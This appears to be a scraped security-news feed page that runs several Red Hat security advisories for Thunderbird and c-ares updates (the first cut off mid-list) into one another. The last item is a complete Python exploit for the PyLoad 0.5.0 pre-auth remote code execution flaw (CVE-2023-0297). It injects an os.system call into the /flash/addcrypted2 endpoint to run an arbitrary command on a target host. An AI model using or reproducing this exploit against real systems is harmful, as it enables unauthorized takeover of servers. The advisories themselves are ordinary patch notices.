thunderbird-102.12.0-1.el8_6.src.rpm

aarch64:  
thunderbird-102.12.0-1.el8_6.aarch64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_6.aarch64.rpm  
thunderbird-debugsource-102.12.0-1.el8_6.aarch64.rpm

ppc64le:  
thunderbird-102.12.0-1.el8_6.ppc64le.rpm  
thunderbird-debuginfo-102.12.0-1.el8_6.ppc64le.rpm  
thunderbird-debugsource-102.12.0-1.el8_6.ppc64le.rpm

s390x:  
thunderbird-102.12.0-1.el8_6.s390x.rpm  
thunderbird-debuginfo-102.12.0-1.el8_6.s390x.rpm  
thunderbird-debugsource-102.12.0-1.el8_6.s390x.rpm

x86_64:  
thunderbird-102.12.0-1.el8_6.x86_64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_6.x86_64.rpm  
thunderbird-debugsource-102.12.0-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-34414  
https://access.redhat.com/security/cve/CVE-2023-34416  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEnNzjgjWX9erEAQgNSw//XrXETd/beU61eyTR7saLUt0Y3E94AdLg  
wTCewFuYxf/fjRbDQKw5BaZ1rVIsxUXVX/bZv1xzIgxHaWaOSZNgq3F3jEZF1l5V  
6jlut+oE9pYfg8nz6LPvElnl1wMGJp0iv2hMuruCUoZ+83/jB2fODfNhqbX2BSwR  
gLQD9oP4hMIw3gXYy2dOds5YDP4vWWrgFYQrZhnhQ5lIGwNpf97HGcZJ1bkquUz6  
YhJ7io7Abe+1//MB5EuCxhaYtPSKEXuolLWzMWuima3fdac5dFQdO75KZIrUxBK/  
NMXCQihRS9IyDJP+MK+PL9KRqtc4XROfqNltmwD+ej/u5Lp83L7NPLvKLcFlt4vX  
NQlh26C9iX/VFaBLk8NmC2sEcEloGoSsiWMVXyGd8K7/V4dmkzM1ogWkBYiWs8Qp  
4a12plO8PgPQJ9JM7HLsxqaVjR0Ms+aL17YXEfOv44ZtuGNKLaBQzAgvYtZqlPZf  
8oSPdo8wnO6m2ZCW51SFVZAyIw4ltmvGssh2xuqjRwRjrRf5+dqAATPe+koeQJs2  
ReL37h/smQucK8cpRYldZt8IoEMJYchWa1t7P6bL1f7hhbJIZmPiPWiq9mUYdXXS  
n6FGvN8+7u3yCtqOEWJ5uF3UWTD5/e+raiKV1UM8vM9fdAk39PRMzjbMNMVoME9N  
8w2oPiU3xMo=  
=4v57  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3566-01

Red Hat Security Advisory 2023-3559-01 - The c-ares C library defines asynchronous DNS requests and provides name resolving API. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: c-ares security update  
Advisory ID:       RHSA-2023:3559-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3559  
Issue date:        2023-06-12  
CVE Names:         CVE-2023-32067   
=====================================================================

1. Summary:

An update for c-ares is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The c-ares C library defines asynchronous DNS (Domain Name System) requests  
and provides name resolving API.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
c-ares-debuginfo-1.17.1-5.el9_2.1.aarch64.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.aarch64.rpm  
c-ares-devel-1.17.1-5.el9_2.1.aarch64.rpm

ppc64le:  
c-ares-debuginfo-1.17.1-5.el9_2.1.ppc64le.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.ppc64le.rpm  
c-ares-devel-1.17.1-5.el9_2.1.ppc64le.rpm

s390x:  
c-ares-debuginfo-1.17.1-5.el9_2.1.s390x.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.s390x.rpm  
c-ares-devel-1.17.1-5.el9_2.1.s390x.rpm

x86_64:  
c-ares-debuginfo-1.17.1-5.el9_2.1.i686.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.x86_64.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.i686.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.x86_64.rpm  
c-ares-devel-1.17.1-5.el9_2.1.i686.rpm  
c-ares-devel-1.17.1-5.el9_2.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
c-ares-1.17.1-5.el9_2.1.src.rpm

aarch64:  
c-ares-1.17.1-5.el9_2.1.aarch64.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.aarch64.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.aarch64.rpm

ppc64le:  
c-ares-1.17.1-5.el9_2.1.ppc64le.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.ppc64le.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.ppc64le.rpm

s390x:  
c-ares-1.17.1-5.el9_2.1.s390x.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.s390x.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.s390x.rpm

x86_64:  
c-ares-1.17.1-5.el9_2.1.i686.rpm  
c-ares-1.17.1-5.el9_2.1.x86_64.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.i686.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.x86_64.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.i686.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEl9zjgjWX9erEAQgEBhAAkund0vpNV0kmQSFqGBzoDRRYym9wxBzw  
XHaV6MsZL0dH01/z35Y4RLcU0S+h6BJT2HDZIznpGd7Vom0gyike6J39fNjmjgEX  
cwf6jH7cJGSw2o8mfvI6mvRZGbv6FDkNvkyBrOznBDn1oJ+PaQIGeQpYVibk8eSn  
TDmvATxIqYO5po3bU+Tgv3QMtsM4rub++7pjJvASbbMZ8QeYPmgyL8jKR9z820rg  
y3h6K6DAvIt4Bh8MVhUNa1kKP1ZUQkCuReH0qp314o5n5W81WksjSsGx9At3dXIi  
6FOvDnRcoCkfAo0+Cv35eLX6AR8YMToMmaZ42B9MXmEZlGKtRPrTXyg0v6Dn+p30  
GWC+RytIf+s+s1l2KL0aEb8oni/aFY7keqlPfH5Ob1uGm5WbG/tnqr9Hhfu1BbtP  
th6Yo8Q/LlEtRSYuO9A4Mq7e+3RVx9nsd7uIJ6GtNDcddDflU5BIVNnwYno9b0N1  
QaljJXhFxzgJfO2BtH8/ahPdvhK+Y5UE2Fjbuj3JUCltUNhQEId3vJWf0hnw1NWa  
7dBWGDaicDmCseLTpDFUDAHlNyDAN4gBQfDUaJ6rNFO3PdKCL419Nkcq1+JEB3e/  
0IRiP95IPI9lu9JnhUGF977IDH6LIcJ/iCDM/jgQifZdCDTSBPEjI4sYArtRYEdS  
AhqlYGP90io=  
=SLSY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3559-01

Red Hat Security Advisory 2023-3565-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.12.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:3565-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3565  
Issue date:        2023-06-12  
CVE Names:         CVE-2023-34414 CVE-2023-34416   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.12.0.

Security Fix(es):

* Mozilla: Click-jacking certificate exceptions through rendering lag  
(CVE-2023-34414)

* Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12  
(CVE-2023-34416)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2212841 - CVE-2023-34414 Mozilla: Click-jacking certificate exceptions through rendering lag  
2212842 - CVE-2023-34416 Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
thunderbird-102.12.0-1.el8_2.src.rpm

aarch64:  
thunderbird-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
thunderbird-102.12.0-1.el8_2.src.rpm

aarch64:  
thunderbird-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
thunderbird-102.12.0-1.el8_2.src.rpm

aarch64:  
thunderbird-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-34414  
https://access.redhat.com/security/cve/CVE-2023-34416  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEk9zjgjWX9erEAQiIhA//XFsAGpWoG3HVGDfk5RrXIQ07z8vPDFC8  
Re4usAqE3m+v1CxbRi/5L8zBTtpo7JQXmImIR5+7o+a3YMG6Edgiw0o+tYhtVGaM  
PWSzuhSaR+ah6Rwa9EtnTxWfCSr71fi6AnJQKAV5IehfVYhulppd2okzHWtKp4mv  
KiwfbYInO/hQTajzJ05nSebCzU25KkhDi2ZvoXxb2l+9qtde0L0WCtVll7HeqXkI  
/nW4ex1Rn7bbZmbt9vYktD9+iPikri4+7QDcVmL17Bf5aJ8bKItvqBxyOz9j2Pwk  
ynXNurKagD4BI0eqwF/nDzX1N0FY0Iu8cZJB+N445MbpiUIpp0jVEp2ogNm6dzfV  
yuTgLuzPWQHEtPpD5j5P8Fvwd/XRgJXeanMZVeEoXrCfnLGQe2FR6bdLsUNzl5JP  
i6iCpNpgunkFUXVH0LmTQnAP3JHtLMRPfUA/rDrI5Vfz+/WdshWWV00a+VNIH1vu  
/JpQfpZdK/TM55vse5IRvPBnmdL2Bw9+Vpr2TbWSlVKMbyoEi6OCJ69ftyUAVbzo  
myI4a9b92EuFasfVARmnQAraPaEe/X87Ct5eYp7BFSfnkkhlvefIJ5erY7xXu1Ov  
xI46V207c6eeWNs5k19g16LB2fSORkk13RKED8ztiuv693gf8q35/HLSf1KC7vQX  
qT0uUNcoyZM=  
=SmEz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3565-01

Red Hat Security Advisory 2023-3564-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.12.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:3564-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3564  
Issue date:        2023-06-12  
CVE Names:         CVE-2023-34414 CVE-2023-34416   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.12.0.

Security Fix(es):

* Mozilla: Click-jacking certificate exceptions through rendering lag  
(CVE-2023-34414)

* Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12  
(CVE-2023-34416)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2212841 - CVE-2023-34414 Mozilla: Click-jacking certificate exceptions through rendering lag  
2212842 - CVE-2023-34416 Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-102.12.0-1.el8_1.src.rpm

ppc64le:  
thunderbird-102.12.0-1.el8_1.ppc64le.rpm  
thunderbird-debuginfo-102.12.0-1.el8_1.ppc64le.rpm  
thunderbird-debugsource-102.12.0-1.el8_1.ppc64le.rpm

x86_64:  
thunderbird-102.12.0-1.el8_1.x86_64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_1.x86_64.rpm  
thunderbird-debugsource-102.12.0-1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-34414  
https://access.redhat.com/security/cve/CVE-2023-34416  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEkdzjgjWX9erEAQh2LQ/9ExmysHlF6ZaYlOozLC2neD48CLJINWUp  
A/1uMaP4Cxf4Lb5rjZgSo0kcJPborjnnzKnMeTGlD3WovGxKqVP5zz1Ez0dbIm7i  
TvFtXDtRrAXMUXmvJy2BYiN2JN7/HnOKxdTce7d0dTmBtOW/PnPF2lfC69XL5f1k  
du7Bdq/rC3913OUo3zFMmQwcS3035zZITvXTAUk26eW2cnF3gJbLOlMfO7crbvfJ  
fympJ/w2llpG4h1AzHc1OpVYyObneL9T6b1PFTx6xJMmkCrWhh3iiXKBpj+b5WXW  
FBx/k2usAjvS6S0GEC3rl6dQBtvKjekpfiDuQiaj/lyLMBt4K/RHl36S83/wpRGA  
Tvn2v9cw/FLXQefOCWRtkkUuMxgdQpRSxMWAM+zNCk6Y0Y5SAbZr1k7xJXcPQlI+  
8jzJ4nIP2i6oaDpIFcD3tDLWsxDg/1WOHyqfetQPTgAi5KNe7lRpHTdbXTDf483b  
UlEUrtnIPPHExXuu91bBcZWYEJKKDyFTUK4iHbk/raAh0p4qHI4kd+rjmR0zlfW7  
zkWVZow/F/P//S0d7XhLbwnU6lVHU5DzpLNnGIzRnrjcFJsoRJQP6Vs6sJNhH/IW  
4SQaIRRAJo694SIUf+aOJdoQrmklfFcG23otVJ6IthQXOCj7sPpc085znS7hBeVx  
gVZZeq1j/Pw=  
=4cSm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3564-01

PyLoad version 0.5.0 suffers from an unauthenticated remote code execution vulnerability.

    # Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)# Date: 06-10-2023# Credits: bAu @bauh0lz # Exploit Author: Gabriel Lima (0xGabe)# Vendor Homepage: https://pyload.net/# Software Link: https://github.com/pyload/pyload# Version: 0.5.0# Tested on: Ubuntu 20.04.6# CVE: CVE-2023-0297import requests, argparseparser = argparse.ArgumentParser()parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')arguments = parser.parse_args()def doRequest(url):    try:        res = requests.get(url)        if res.status_code == 200:            return True        else:            return False    except requests.exceptions.RequestException as e:        print("[!] Maybe the host is offline :", e)        exit()def runExploit(url, cmd):    endpoint = url + '/flash/addcrypted2'    if " " in cmd:        validCommand = cmd.replace(" ", "%20")    else:        validCommand = cmd    payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'    test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)    print('[+] The exploit has be executeded in target machine. ')def main(targetUrl, Command):    print('[+] Check if target host is alive: ' + targetUrl)    alive = doRequest(targetUrl)    if alive == True:        print("[+] Host up, let's exploit! ")        runExploit(targetUrl,Command)    else:        print('[-] Host down! ')if(arguments.url != None and arguments.cmd != None):    targetUrl = arguments.url    Command = arguments.cmd    main(targetUrl, Command)

Source

Packet Storm